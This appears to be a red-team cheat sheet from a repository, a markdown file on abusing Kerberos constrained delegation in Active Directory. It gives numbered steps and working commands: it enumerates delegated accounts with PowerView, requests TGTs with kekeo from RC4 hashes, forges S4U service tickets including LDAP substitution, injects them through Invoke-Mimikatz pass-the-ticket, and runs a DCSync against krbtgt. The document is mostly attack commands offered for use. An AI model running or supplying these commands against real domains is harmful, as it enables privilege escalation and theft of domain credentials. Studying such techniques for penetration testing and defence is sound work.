Skip to content

Latest commit

 

History

History
40 lines (34 loc) · 1.47 KB

3-Constrained-Delegation.md

File metadata and controls

40 lines (34 loc) · 1.47 KB

Constrained Delegation

Methodology/Steps

  1. List all the users having Constrained Delegation
  2. Keep a note of the msDS-AllowedToDelegateTo value
  3. Request for a TGT using the hash of the user with CD using kekeo (Which me must have collected before)
  4. Keep a note of the TGT return ticket
  5. Now request a TGS with the 2nd step and 4th step values as parameters in /service and /tgt
  6. Keep a note of the TGS return Ticket
  7. Now we can inject the TGS return Ticket with Inkove-Mimikatz
  8. We can now list the file systems of that account. Example : ls \\dc-mysql\C$ but can not use any WMI-Commands
  9. But if the user DC we can do the same process and then do a DCSync attack

Enumerate users and computers with CD enabled

Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

Requesting a TGT

tgt::ask /user:websvc /domain:domain.local /rc4:cc098f204c5887eaa8253e7c2749156f
tgt::ask /user:dcorp-adminsrv /domain:domain.local /rc4:1fadb1b13edbc5a61cbdc389e6f34c67

Request a TGS

tgs::s4u /tgt:TGT.kirbi /user:[email protected] /service:cifs/computer.domain.LOCAL
tgs::s4u /tgt:TGT.kirbi /user:[email protected] /service:time/computer.domain.LOCAL|ldap/computer.domain.LOCAL

Inject the ticket

Invoke-Mimikatz -Command '"kerberos::ptt TGS.kirbi"'

Execute DCSync

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'